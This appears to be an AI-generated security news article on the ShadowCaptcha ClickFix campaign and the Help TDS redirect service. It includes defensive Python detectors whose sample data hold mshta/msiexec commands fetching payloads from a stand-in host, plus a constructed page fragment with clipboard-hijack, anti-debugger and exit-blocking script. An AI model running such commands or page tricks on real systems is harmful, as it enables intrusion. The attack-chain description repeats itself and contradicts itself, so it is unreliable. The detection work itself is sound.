Ethical Hacking News
A new large-scale campaign known as ShadowCaptcha has been identified as exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners. This malicious operation utilizes a combination of social engineering tactics, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain control over targeted systems.
The ShadowCaptcha campaign, first detected in August 2025, has been identified as exploiting over 100 compromised WordPress sites to spread ransomware, information stealers, and cryptocurrency miners. It combines social engineering tactics, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain control over targeted systems.
According to researchers from the Israel National Digital Agency, the ShadowCaptcha campaign blends social engineering, LOLBins, and multi-stage payload delivery to achieve its objectives. The ultimate goals of this campaign include collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.
The attacks begin with unsuspecting users visiting a compromised WordPress website that has been injected with malicious JavaScript code responsible for initiating a redirection chain that takes them to a fake Cloudflare or Google CAPTCHA page. From there, the attack chain forks into two different paths depending on the ClickFix instructions displayed on the web page.
One path utilizes the Windows Run dialog, culminating in the deployment of Lumma and Rhadamanthys stealers via MSI installers launched using msiexec.exe or through remotely-hosted HTA files run using mshta.exe. The other path guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.
The execution flow triggered via the Windows Run dialog ends with the deployment of Epsilon Red ransomware, while the execution of the saved HTA payload results in the installation of this ransomware.
It's worth noting that the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK. The compromised ClickFix page automatically executes obfuscated JavaScript that uses 'navigator.clipboard.writeText' to copy a malicious command to the user's clipboard without any interaction, relying on users to paste and run it unknowingly.
The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, while also relying on DLL side-loading to execute malicious code under the guise of legitimate processes.
The attackers have been observed delivering an XMRig-based cryptocurrency miner with some variants fetching the mining configuration from a Pastebin URL rather than hard-coding it in the malware, thus allowing them to adjust the parameters on the fly. In cases where the miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver ("WinRing0x64.sys") to achieve kernel-level access and interact with CPU registers with an aim to improve mining efficiency.
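The two infection paths described above (msiexec.exe and mshta.exe launched with remote URLs or a locally saved HTA after a ClickFix lure) and the WinRing0x64.sys driver dropped beside the miner are all visible in endpoint telemetry. The following Python is an added detection example, not code from the researchers or from the campaign: it parses constructed process-creation and driver-load events in a simplified key=value format (an assumption of this example, not a real EDR schema), and flags the LOLBin and driver patterns the article names. The hostnames, paths and the explorer.exe-as-parent heuristic for Run-dialog launches are assumptions.

```python
import re

# Constructed sample events (key=value, quoted values may contain spaces).
# Hosts and paths are invented for the example and are not campaign indicators.
SAMPLE_EVENTS = [
    r'type=process parent=C:\Windows\explorer.exe image=C:\Windows\System32\mshta.exe cmdline="mshta.exe https://captcha.example.invalid/verify.hta"',
    r'type=process parent=C:\Windows\explorer.exe image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /i https://captcha.example.invalid/update.msi /qn"',
    r'type=process parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\msiexec.exe cmdline="msiexec.exe /i C:\installers\app.msi /qn"',
    r'type=process parent=C:\Windows\explorer.exe image=C:\Windows\System32\mshta.exe cmdline="mshta.exe C:\Users\alice\Downloads\page.hta"',
    r'type=driver image=C:\Users\alice\AppData\Local\Temp\WinRing0x64.sys',
    r'type=driver image=C:\Windows\System32\drivers\disk.sys',
    r'type=process parent=C:\Windows\explorer.exe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r'\b(?:https?|ftp)://', re.IGNORECASE)
LOLBINS = {"mshta.exe", "msiexec.exe"}
# WinRing0x64.sys is the driver named in the article; extend from a known-bad driver list.
VULN_DRIVERS = {"winring0x64.sys"}


def parse_event(line: str) -> dict:
    """Split one key=value line into a dict."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    """Heuristic: user profile, AppData or a temp directory."""
    p = path.lower()
    return "\\users\\" in p or "\\temp\\" in p or "\\appdata\\" in p


def assess(event: dict) -> list:
    """Return (severity, reason) pairs for one parsed event."""
    findings = []
    kind = event.get("type")
    image = basename(event.get("image", ""))
    if kind == "process":
        cmd = event.get("cmdline", "")
        parent = basename(event.get("parent", ""))
        if image in LOLBINS and URL_RE.search(cmd):
            findings.append(("high", f"{image} launched with a remote URL"))
        elif image == "mshta.exe" and is_user_writable(cmd):
            findings.append(("medium", "mshta.exe running an HTA from a user-writable path"))
        # The Run dialog is hosted by explorer.exe, so explorer.exe as the parent of a
        # LOLBin matches the 'paste into Win+R' lure (assumption about parent attribution).
        if findings and parent == "explorer.exe":
            findings.append(("info", "interactive launch with explorer.exe as parent"))
    elif kind == "driver":
        if image in VULN_DRIVERS:
            findings.append(("high", f"known vulnerable driver {image} loaded from {event.get('image')}"))
        elif is_user_writable(event.get("image", "")):
            findings.append(("medium", "driver loaded from a user-writable path"))
    return findings


def scan(lines) -> list:
    """Run assess() over raw log lines and return the flagged ones."""
    alerts = []
    for index, line in enumerate(lines):
        for severity, reason in assess(parse_event(line)):
            alerts.append({"line": index, "severity": severity, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']:>6}] line {alert['line']}: {alert['reason']}")
```

On the sample set this flags the two remote-URL launches and the driver load as high, the HTA run from Downloads as medium, and leaves the locally sourced msiexec install and notepad.exe alone. The same rules translate directly into a Sysmon event ID 1 (process create) and event ID 6 (driver load) query.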
Of the infected WordPress sites, a majority of them are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning various sectors such as technology, hospitality, legal/finance, healthcare, and real estate. It's essential to train users to watch out for ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites are kept up-to-date and secured using multi-factor authentication (MFA) protections.
"ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations," the researchers said. "By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware."
The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately directing users to malicious destinations based on the targeting criteria.
"The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams," security researcher Denis Sinegubko said.
Some of the notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages use JavaScript to force browsers to enter full-screen mode and display the fraudulent alert and even feature counterfeit CAPTCHA challenges before rendering them in a bid to sidestep automated security scanners.
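The ShadowCaptcha pages (clipboard writes via navigator.clipboard.writeText with no user gesture, anti-debugger tricks) and the Help TDS scam pages (forced full-screen, exit prevention, counterfeit CAPTCHA text) share a small set of client-side indicators that a site owner can scan their own WordPress output for. The following Python is an added example, not code from GoDaddy, the Israel National Digital Agency or the campaigns: it scores HTML documents on those indicators. The two page fragments, the regexes and the weights are constructed for this example; the placeholder in atob() is not a real payload.

```python
import re

# Constructed page fragments used as input; neither is code from the campaigns.
BENIGN_PAGE = """<html><body>
<button id="copy">Copy link</button>
<script>
document.getElementById('copy').addEventListener('click', function () {
  navigator.clipboard.writeText(location.href);
});
</script></body></html>"""

SUSPICIOUS_PAGE = """<html><body>
<div class="cf-box">Verify you are human</div>
<script>
(function () { var c = atob('PLACEHOLDER'); navigator.clipboard.writeText(c); })();
setInterval(function () { debugger; }, 50);
document.documentElement.requestFullscreen();
window.onbeforeunload = function () { return ''; };
</script></body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
TAG_RE = re.compile(r"<[^>]+>")

# (indicator name, pattern applied to the page's script text, weight).
# Weights are this example's own choice, not a published scoring scheme.
SCRIPT_INDICATORS = [
    ("anti_debugger_loop",
     re.compile(r"(?:set(?:Interval|Timeout)|while)\s*\(.{0,120}?\bdebugger\b", re.DOTALL), 2),
    ("forced_fullscreen", re.compile(r"\.requestFullscreen\s*\("), 1),
    ("exit_prevention", re.compile(r"onbeforeunload|['\"]beforeunload['\"]"), 1),
    ("decoding_or_eval", re.compile(r"\batob\s*\(|String\.fromCharCode|\beval\s*\("), 1),
]
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText\s*\(")
GESTURE_RE = re.compile(r"addEventListener\s*\(\s*['\"]click['\"]|\.onclick\s*=")
CAPTCHA_TEXT_RE = re.compile(r"verify you are human|i am not a robot|checking your browser",
                             re.IGNORECASE)
FLAG_THRESHOLD = 4


def script_text(html: str) -> str:
    """Concatenate the bodies of all <script> elements."""
    return "\n".join(SCRIPT_RE.findall(html))


def visible_text(html: str) -> str:
    """Rough text content with scripts and tags removed."""
    return TAG_RE.sub(" ", SCRIPT_RE.sub(" ", html))


def score_page(html: str):
    """Return (score, indicator names) for one HTML document."""
    js = script_text(html)
    hits, score = [], 0
    if CLIPBOARD_RE.search(js):
        # A clipboard write with no click handler anywhere in the page's scripts is the
        # ClickFix signature; a write tied to a click is an ordinary copy button.
        if GESTURE_RE.search(js):
            hits.append("clipboard_write_on_click")
            score += 1
        else:
            hits.append("clipboard_write_without_gesture")
            score += 3
    for name, pattern, weight in SCRIPT_INDICATORS:
        if pattern.search(js):
            hits.append(name)
            score += weight
    if CAPTCHA_TEXT_RE.search(visible_text(html)):
        hits.append("captcha_like_text")
        score += 1
    return score, hits


def is_suspicious(html: str) -> bool:
    return score_page(html)[0] >= FLAG_THRESHOLD


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("suspicious", SUSPICIOUS_PAGE)):
        print(label, score_page(page))
```

The gesture check is deliberately coarse: a static scanner cannot prove that a clipboard write runs inside a user-activation context, so an unconditional write is scored high and a write near a click handler low, and the threshold keeps a copy-link button from being flagged on its own. Running this over the rendered HTML of each page (after any injected inline script has been emitted) is the useful mode, since the injection happens server-side in the compromised WordPress install.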
Help TDS operators are said to have developed a malicious WordPress plugin known as "woocommerce_inputs" between late 2024 and August 2025 to enable the redirection functionality, alongside steadily adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on over 10,000 sites worldwide.
"This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering," GoDaddy said. "By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites."
Related Information:
https://www.ethicalhackingnews.com/articles/New-ShadowCaptcha-Campaign-Spreads-Ransomware-Info-Stealers-and-Crypto-Miners-Through-Exploited-WordPress-Sites-ehn.shtml
https://thehackernews.com/2025/08/shadowcaptcha-exploits-wordpress-sites.html
Published: Tue Aug 26 07:46:26 2025 by llama3.2 3B Q4_K_M